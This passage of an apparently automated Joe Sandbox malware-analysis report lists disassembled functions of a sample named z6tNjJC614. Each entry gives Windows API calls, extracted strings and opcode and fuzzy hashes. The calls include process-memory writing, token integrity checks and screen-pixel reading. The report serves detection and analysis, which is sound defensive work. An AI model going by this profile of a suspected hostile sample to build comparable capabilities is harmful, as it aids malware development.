                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow$_memmove
                                                                      • String ID:
                                                                      • API String ID: 2983881199-0
                                                                      • Opcode ID: 022d7fbcfec9563231920c258cfcfd1793e3f5dccc91b6280df321f76127c845
                                                                      • Instruction ID: e2826e73a2ebdf55e71c86ac49dc878ba06f28bbc7daf12dcf4260d2f0de141e
                                                                      • Opcode Fuzzy Hash: 022d7fbcfec9563231920c258cfcfd1793e3f5dccc91b6280df321f76127c845
                                                                      • Instruction Fuzzy Hash: B3210431700209BBDB10AB64DC89EEE3FACFBC8710F044425F905DB2D0E6B08D959791
                                                                      Function 00585A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindow.USER32(00000000), ref: 00585A6E
                                                                      • GetForegroundWindow.USER32 ref: 00585A85
                                                                      • GetDC.USER32(00000000), ref: 00585AC1
                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00585ACD
                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00585B08
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: fbf031f8a90d4a1bf992d9d3b57ccee5687b039d53eb58d11440e3046fe9675f
                                                                      • Instruction ID: 1bf9cbbbc2b2059d679403af0fd3227399b10da013a2529200c90353da47f77b
                                                                      • Opcode Fuzzy Hash: fbf031f8a90d4a1bf992d9d3b57ccee5687b039d53eb58d11440e3046fe9675f
                                                                      • Instruction Fuzzy Hash: F821A435A00204AFD704EF65DC89AAABBE5FF98311F158479F80AD7352DA30AD44DB90
                                                                      Function 005112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0051134D
                                                                      • SelectObject.GDI32(?,00000000), ref: 0051135C
                                                                      • BeginPath.GDI32(?), ref: 00511373
                                                                      • SelectObject.GDI32(?,00000000), ref: 0051139C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 86b51d977a18d1a3c75b844ad378deff40bc5ce1c88c35159f8ec208e5562b07
                                                                      • Instruction ID: 55de3a163487c6baf56a27d0ae5fe209109030f806a62a3e8d884e8b47a1c05d
                                                                      • Opcode Fuzzy Hash: 86b51d977a18d1a3c75b844ad378deff40bc5ce1c88c35159f8ec208e5562b07
                                                                      • Instruction Fuzzy Hash: DF216230801A08DFEB209F25DC087A97FA8FB20311F244657F521961B4E7709899FF94
                                                                      Function 00574A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00574ABA
                                                                      • __beginthreadex.LIBCMT ref: 00574AD8
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00574AED
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00574B03
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00574B0A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                      • String ID:
                                                                      • API String ID: 3824534824-0
                                                                      • Opcode ID: 9074b030c2b259d49e0552dcd6a3c39235d173533b06e73d87366f5a6d5b079d
                                                                      • Instruction ID: 5c4282c522a2f4373c1bf119f7b8844e8614221c6e0156a6e0a1057c812dd46e
                                                                      • Opcode Fuzzy Hash: 9074b030c2b259d49e0552dcd6a3c39235d173533b06e73d87366f5a6d5b079d
                                                                      • Instruction Fuzzy Hash: 71110876905214BBCB118FA8EC08A9B7FACFB55321F158267F818D3250D775CD08ABA0
                                                                      Function 00568202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0056821E
                                                                      • GetLastError.KERNEL32(?,00567CE2,?,?,?), ref: 00568228
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00567CE2,?,?,?), ref: 00568237
                                                                      • HeapAlloc.KERNEL32(00000000,?,00567CE2,?,?,?), ref: 0056823E
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568255
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: fc1347762af5995aa69a74354c4a4f9cdc15cc73b750e4170628c34ae04d75a2
                                                                      • Instruction ID: df56d572691bc2c5b4e7dd3c922eea777824deae7b403fdc6bf2317385191833
                                                                      • Opcode Fuzzy Hash: fc1347762af5995aa69a74354c4a4f9cdc15cc73b750e4170628c34ae04d75a2
                                                                      • Instruction Fuzzy Hash: D40169B5204204BFDB204FA6DC48D7B7FADFF9A755B60052AF809C3220DA318C44EBA0
                                                                      Function 0056710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?,?,00567455), ref: 00567127
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?), ref: 00567142
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?), ref: 00567150
                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?), ref: 00567160
                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?), ref: 0056716C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: 2868a8197fa6f7794e386ff75a6418700638ae5aa5f9d3d458837f79806ec638
                                                                      • Instruction ID: 469b1248ea086845965632228962d064fe2edbe7d4f406f87524386be60388df
                                                                      • Opcode Fuzzy Hash: 2868a8197fa6f7794e386ff75a6418700638ae5aa5f9d3d458837f79806ec638
                                                                      • Instruction Fuzzy Hash: 2D017CB2601208ABDB114F64DC44AAA7FADFB49795F1501A6FD04D3220D771DD41EBA0
                                                                      Function 00575244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575260
                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0057526E
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575276
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00575280
                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005752BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: cfa538dcae72853b1e5544fd3c26e0d94503b1a063aab5fd934b780d718e096d
                                                                      • Instruction ID: 8818744e00ac26a20fdd09f2f1e2dd3bc666d5e99d10f27f920a1fa2f8cae15d
                                                                      • Opcode Fuzzy Hash: cfa538dcae72853b1e5544fd3c26e0d94503b1a063aab5fd934b780d718e096d
                                                                      • Instruction Fuzzy Hash: 32018735C01A19DBCF00EFE4E848AEDBB78FB08301F014456E909F2242EBB09914EBA1
                                                                      Function 0056810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00568121
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0056812B
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0056813A
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00568141
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568157
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 61beedb0047f35b90bb9d4274f92fb59cd9507284ad8afc512e0d742b74be17e
                                                                      • Instruction ID: a77294159c807550dfe0bfda1df3948cb1051b36684b778c1edb85657111004d
                                                                      • Opcode Fuzzy Hash: 61beedb0047f35b90bb9d4274f92fb59cd9507284ad8afc512e0d742b74be17e
                                                                      • Instruction Fuzzy Hash: DAF04F71200304AFEB210FA5EC99F7B3FACFF4A758B150126F945C7160CA719985EB60
                                                                      Function 0056C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0056C1F7
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0056C20E
                                                                      • MessageBeep.USER32(00000000), ref: 0056C226
                                                                      • KillTimer.USER32(?,0000040A), ref: 0056C242
                                                                      • EndDialog.USER32(?,00000001), ref: 0056C25C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: 6899c11674f2523a2e85266a4bb68620a2b02563066afca594b9003f3b361a95
                                                                      • Instruction ID: 315ccaba7328927bb6edf0fb09af0678dd7672c178f41d74d815ca3f8c60ce3e
                                                                      • Opcode Fuzzy Hash: 6899c11674f2523a2e85266a4bb68620a2b02563066afca594b9003f3b361a95
                                                                      • Instruction Fuzzy Hash: 5D01A73450430497EB205B64DD5EBA67F78FB10705F04066AA9C2D14E0D7E469989B90
                                                                      Function 005113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EndPath.GDI32(?), ref: 005113BF
                                                                      • StrokeAndFillPath.GDI32(?,?,0054B888,00000000,?), ref: 005113DB
                                                                      • SelectObject.GDI32(?,00000000), ref: 005113EE
                                                                      • DeleteObject.GDI32 ref: 00511401
                                                                      • StrokePath.GDI32(?), ref: 0051141C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: b59c1fced93a39fe3a2b734aec0ec512128f748313833e1c08fb30199b9a1e7e
                                                                      • Instruction ID: ca63725f21dd22a280616053ba5df3e1a985d52f1aa4193417bfd391759bf8c7
                                                                      • Opcode Fuzzy Hash: b59c1fced93a39fe3a2b734aec0ec512128f748313833e1c08fb30199b9a1e7e
                                                                      • Instruction Fuzzy Hash: CBF0CD30005B08DBDB215F26EC4C7983FA8B721726F288267E52A890F1D771559DFF54
                                                                      Function 00522CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00530DB6: std::exception::exception.LIBCMT ref: 00530DEC
                                                                        • Part of subcall function 00530DB6: __CxxThrowException@8.LIBCMT ref: 00530E01
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 00517A51: _memmove.LIBCMT ref: 00517AAB
                                                                      • __swprintf.LIBCMT ref: 00522ECD
                                                                      Strings
                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00522D66
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                      • API String ID: 1943609520-557222456
                                                                      • Opcode ID: 85ff0f2cc225ba4a5857d107778bc0af85e6aef15c5d919ff40977c871115dea
                                                                      • Instruction ID: 7433f9669e19b64e0f64f9754ac10d06975f67d900e3b0a256f249b5c89a76c5
                                                                      • Opcode Fuzzy Hash: 85ff0f2cc225ba4a5857d107778bc0af85e6aef15c5d919ff40977c871115dea
                                                                      • Instruction Fuzzy Hash: 7C916075108216AFD714EF28D899CAE7FB8FF85310F40491DF8559B2A1EA30ED48CB52
                                                                      Function 0057B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00514750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00514743,?,?,005137AE,?), ref: 00514770
                                                                      • CoInitialize.OLE32(00000000), ref: 0057B9BB
                                                                      • CoCreateInstance.OLE32(005A2D6C,00000000,00000001,005A2BDC,?), ref: 0057B9D4
                                                                      • CoUninitialize.OLE32 ref: 0057B9F1
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                      • String ID: .lnk
                                                                      • API String ID: 2126378814-24824748
                                                                      • Opcode ID: cccfe09d49f1ab010f16c1234891516be38cbcfd860036c68409b638c19b385c
                                                                      • Instruction ID: c7a0b14b929e9cb7c83cbf736a4bd31fd6f6c32a8a2a880dca8fde0ff353a044
                                                                      • Opcode Fuzzy Hash: cccfe09d49f1ab010f16c1234891516be38cbcfd860036c68409b638c19b385c
                                                                      • Instruction Fuzzy Hash: 43A14A75604306AFDB00EF14C494E5ABBE5FF89314F148958F8999B3A1CB31ED85CB91
                                                                      Function 0056B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0056B4BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ContainedObject
                                                                      • String ID: AutoIt3GUI$Container$%Z
                                                                      • API String ID: 3565006973-2044686524
                                                                      • Opcode ID: 958d1f4b842a293dc133c67aa4634afb846a30dd2808e3111c789fa2a5c1cd95
                                                                      • Instruction ID: 6a79d815776f7c6cfa664c2c865d8eb20e97180b3c17aeac6857e9954be6e034
                                                                      • Opcode Fuzzy Hash: 958d1f4b842a293dc133c67aa4634afb846a30dd2808e3111c789fa2a5c1cd95
                                                                      • Instruction Fuzzy Hash: EA914A70600601AFEB14DF64C884B6ABBE5FF49711F20896DF946CB7A1EB71E881CB50
                                                                      Function 0053501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 005350AD
                                                                        • Part of subcall function 005400F0: __87except.LIBCMT ref: 0054012B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__87except__start
                                                                      • String ID: pow
                                                                      • API String ID: 2905807303-2276729525
                                                                      • Opcode ID: 993d33a32d6e162489f63f8cc5ad6f8db0a68312017fee1e506c8edbfd9b9daa
                                                                      • Instruction ID: 5137724b8ed9c0f29d4776b4840ac7325cdba064385e106eb46c2e1722c0f8e4
                                                                      • Opcode Fuzzy Hash: 993d33a32d6e162489f63f8cc5ad6f8db0a68312017fee1e506c8edbfd9b9daa
                                                                      • Instruction Fuzzy Hash: C951563190CA0286DB157B24CC593BE3F90BB40714F30BD59E5D5862E9FE358DC8EA82
                                                                      Function 00558584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: 3cR$_R
                                                                      • API String ID: 4104443479-502522525
                                                                      • Opcode ID: 49ee273b64c5c69efe70ed71d64759c7b616b0fdedb134771b9737da19ed5ff0
                                                                      • Instruction ID: e06b983bf0b324dbee8f29b9ddbdf8408288d05a2c461894faf6d642eea4cf0f
                                                                      • Opcode Fuzzy Hash: 49ee273b64c5c69efe70ed71d64759c7b616b0fdedb134771b9737da19ed5ff0
                                                                      • Instruction Fuzzy Hash: 39518C70A00619DFCF64CF68C894ABEBBB1FF45305F14852AE85AE7250EB30A959CF51
                                                                      Function 005697F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 005714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569296,?,?,00000034,00000800,?,00000034), ref: 005714E6
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0056983F
